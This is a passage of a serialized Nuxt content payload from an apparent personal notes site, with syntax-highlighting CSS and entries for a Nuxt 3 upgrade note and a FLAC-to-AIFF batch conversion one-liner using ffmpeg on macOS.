var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":44,"searchDepth":65,"depth":65,"links":1216},[],"2022-08-15","Simple command to upgrade Nuxt 3 to the latest version",{},"\u002Fnotes\u002Ffrontend\u002Fhow-to-upgrade-nuxt-3",{"title":1179,"description":1218},{"loc":1220},"notes\u002Ffrontend\u002Fhow-to-upgrade-nuxt-3",[1225,43,1226],"nuxt","cli","dM5MoKBMK4iO3YLcsO41-7FRCbfQBNHrd0MQxnAIkWM",{"id":1229,"title":1230,"author":6,"body":1231,"date":1344,"description":1345,"extension":335,"image":336,"meta":1346,"navigation":85,"path":1347,"seo":1348,"sitemap":1349,"stem":1350,"tags":1351,"__hash__":1355},"content_en\u002Fnotes\u002Fdevops\u002Fbatch-convert-music-files-flac-aiff-ffmpeg.md","Batch converting FLAC to AIFF using ffmpeg",{"type":8,"value":1232,"toc":1342},[1233,1236,1239,1255,1266,1339],[11,1234,1230],{"id":1235},"batch-converting-flac-to-aiff-using-ffmpeg",[15,1237,1238],{},"You need ffmpeg to be installed. 
For macOS:",[39,1240,1242],{"className":1187,"code":1241,"language":1189,"meta":44,"style":44},"brew install ffmpeg\n",[19,1243,1244],{"__ignoreMap":44},[48,1245,1246,1249,1252],{"class":50,"line":51},[48,1247,1248],{"class":104},"brew",[48,1250,1251],{"class":78}," install",[48,1253,1254],{"class":78}," ffmpeg\n",[15,1256,1257,1258,1261,1262,1265],{},"This command will convert all ",[19,1259,1260],{},"*.flac"," files to ",[19,1263,1264],{},"*.aiff",":",[39,1267,1269],{"className":1187,"code":1268,"language":1189,"meta":44,"style":44},"for i in *.flac; do ffmpeg -i \"$i\" -write_id3v2 1 -c:v copy \"${i%.*}.aiff\"; done\n",[19,1270,1271],{"__ignoreMap":44},[48,1272,1273,1276,1279,1282,1285,1288,1291,1294,1297,1300,1303,1306,1309,1312,1315,1318,1321,1324,1327,1329,1331,1334,1336],{"class":50,"line":51},[48,1274,1275],{"class":68},"for",[48,1277,1278],{"class":54}," i ",[48,1280,1281],{"class":68},"in",[48,1283,1284],{"class":78}," *.flac",[48,1286,1287],{"class":54},"; ",[48,1289,1290],{"class":68},"do",[48,1292,1293],{"class":104}," ffmpeg",[48,1295,1296],{"class":117}," -i",[48,1298,1299],{"class":78}," \"",[48,1301,1302],{"class":54},"$i",[48,1304,1305],{"class":78},"\"",[48,1307,1308],{"class":117}," -write_id3v2",[48,1310,1311],{"class":117}," 1",[48,1313,1314],{"class":117}," -c:v",[48,1316,1317],{"class":78}," copy",[48,1319,1320],{"class":78}," \"${",[48,1322,1323],{"class":54},"i",[48,1325,1326],{"class":68},"%",[48,1328,26],{"class":78},[48,1330,192],{"class":68},[48,1332,1333],{"class":78},"}.aiff\"",[48,1335,1287],{"class":54},[48,1337,1338],{"class":68},"done\n",[328,1340,1341],{},"html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: 
var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}",{"title":44,"searchDepth":65,"depth":65,"links":1343},[],"2022-08-10","One-liner to convert all FLAC files to AIFF format using ffmpeg on 
macOS",{},"\u002Fnotes\u002Fdevops\u002Fbatch-convert-music-files-flac-aiff-ffmpeg",{"title":1230,"description":1345},{"loc":1347},"notes\u002Fdevops\u002Fbatch-convert-music-files-flac-aiff-ffmpeg",[1352,1353,1226,1354],"ffmpeg","audio","macos","TAUWGNDcayHB2yDba8Sq8DH-TcIpYitPjo-XPI7ple0",[1357,1584],{"id":4,"title":5,"author":6,"body":1358,"date":333,"description":334,"extension":335,"image":336,"meta":1580,"navigation":85,"path":338,"seo":1581,"sitemap":1582,"stem":341,"tags":1583,"__hash__":345},{"type":8,"value":1359,"toc":1578},[1360,1362,1368,1374,1576],[11,1361,5],{"id":13},[15,1363,17,1364,22,1366,26],{},[19,1365,21],{},[19,1367,25],{},[15,1369,29,1370,33,1372,37],{},[19,1371,32],{},[19,1373,36],{},[39,1375,1376],{"className":41,"code":42,"language":43,"meta":44,"style":44},[19,1377,1378,1386,1396,1400,1408,1414,1426,1434,1440,1444,1448,1464,1474,1478,1482,1488,1496,1500,1504,1508,1512,1520,1524,1532,1544,1556,1568],{"__ignoreMap":44},[48,1379,1380,1382,1384],{"class":50,"line":51},[48,1381,55],{"class":54},[48,1383,59],{"class":58},[48,1385,62],{"class":54},[48,1387,1388,1390,1392,1394],{"class":50,"line":65},[48,1389,69],{"class":68},[48,1391,72],{"class":54},[48,1393,75],{"class":68},[48,1395,79],{"class":78},[48,1397,1398],{"class":50,"line":82},[48,1399,86],{"emptyLinePlaceholder":85},[48,1401,1402,1404,1406],{"class":50,"line":89},[48,1403,92],{"class":68},[48,1405,95],{"class":68},[48,1407,98],{"class":54},[48,1409,1410,1412],{"class":50,"line":101},[48,1411,105],{"class":104},[48,1413,108],{"class":54},[48,1415,1416,1418,1420,1422,1424],{"class":50,"line":111},[48,1417,114],{"class":68},[48,1419,118],{"class":117},[48,1421,121],{"class":68},[48,1423,124],{"class":104},[48,1425,127],{"class":54},[48,1427,1428,1430,1432],{"class":50,"line":130},[48,1429,133],{"class":54},[48,1431,136],{"class":117},[48,1433,139],{"class":54},[48,1435,1436,1438],{"class":50,"line":142},[48,1437,145],{"class":54},[48,1439,148],{"class":117},[48,1441,1442],{"class":50,"
line":151},[48,1443,154],{"class":54},[48,1445,1446],{"class":50,"line":157},[48,1447,86],{"emptyLinePlaceholder":85},[48,1449,1450,1452,1454,1456,1458,1460,1462],{"class":50,"line":162},[48,1451,114],{"class":68},[48,1453,167],{"class":117},[48,1455,121],{"class":68},[48,1457,172],{"class":104},[48,1459,175],{"class":54},[48,1461,178],{"class":68},[48,1463,98],{"class":54},[48,1465,1466,1468,1470,1472],{"class":50,"line":183},[48,1467,186],{"class":68},[48,1469,189],{"class":54},[48,1471,192],{"class":68},[48,1473,195],{"class":54},[48,1475,1476],{"class":50,"line":198},[48,1477,154],{"class":54},[48,1479,1480],{"class":50,"line":203},[48,1481,86],{"emptyLinePlaceholder":85},[48,1483,1484,1486],{"class":50,"line":208},[48,1485,211],{"class":68},[48,1487,98],{"class":54},[48,1489,1490,1492,1494],{"class":50,"line":216},[48,1491,219],{"class":68},[48,1493,222],{"class":104},[48,1495,225],{"class":54},[48,1497,1498],{"class":50,"line":228},[48,1499,231],{"class":54},[48,1501,1502],{"class":50,"line":234},[48,1503,237],{"class":54},[48,1505,1506],{"class":50,"line":240},[48,1507,243],{"class":54},[48,1509,1510],{"class":50,"line":246},[48,1511,249],{"class":54},[48,1513,1514,1516,1518],{"class":50,"line":252},[48,1515,255],{"class":54},[48,1517,59],{"class":58},[48,1519,62],{"class":54},[48,1521,1522],{"class":50,"line":262},[48,1523,86],{"emptyLinePlaceholder":85},[48,1525,1526,1528,1530],{"class":50,"line":267},[48,1527,55],{"class":54},[48,1529,272],{"class":58},[48,1531,62],{"class":54},[48,1533,1534,1536,1538,1540,1542],{"class":50,"line":277},[48,1535,280],{"class":54},[48,1537,15],{"class":58},[48,1539,285],{"class":54},[48,1541,15],{"class":58},[48,1543,62],{"class":54},[48,1545,1546,1548,1550,1552,1554],{"class":50,"line":292},[48,1547,280],{"class":54},[48,1549,15],{"class":58},[48,1551,299],{"class":54},[48,1553,15],{"class":58},[48,1555,62],{"class":54},[48,1557,1558,1560,1562,1564,1566],{"class":50,"line":306},[48,1559,280],{"class":54},[48,1561,15],{"clas
s":58},[48,1563,313],{"class":54},[48,1565,15],{"class":58},[48,1567,62],{"class":54},[48,1569,1570,1572,1574],{"class":50,"line":320},[48,1571,255],{"class":54},[48,1573,272],{"class":58},[48,1575,62],{"class":54},[328,1577,330],{},{"title":44,"searchDepth":65,"depth":65,"links":1579},[],{},{"title":5,"description":334},{"loc":338},[43,343,344],{"id":1178,"title":1179,"author":6,"body":1585,"date":1217,"description":1218,"extension":335,"image":336,"meta":1612,"navigation":85,"path":1220,"seo":1613,"sitemap":1614,"stem":1223,"tags":1615,"__hash__":1227},{"type":8,"value":1586,"toc":1610},[1587,1589,1601,1603,1608],[11,1588,1179],{"id":1184},[39,1590,1591],{"className":1187,"code":1188,"language":1189,"meta":44,"style":44},[19,1592,1593],{"__ignoreMap":44},[48,1594,1595,1597,1599],{"class":50,"line":51},[48,1596,1196],{"class":104},[48,1598,1199],{"class":78},[48,1600,1202],{"class":78},[15,1602,1205],{},[39,1604,1606],{"className":1605,"code":1209,"language":437},[435],[19,1607,1209],{"__ignoreMap":44},[328,1609,1214],{},{"title":44,"searchDepth":65,"depth":65,"links":1611},[],{},{"title":1179,"description":1218},{"loc":1220},[1225,43,1226],1776084468190]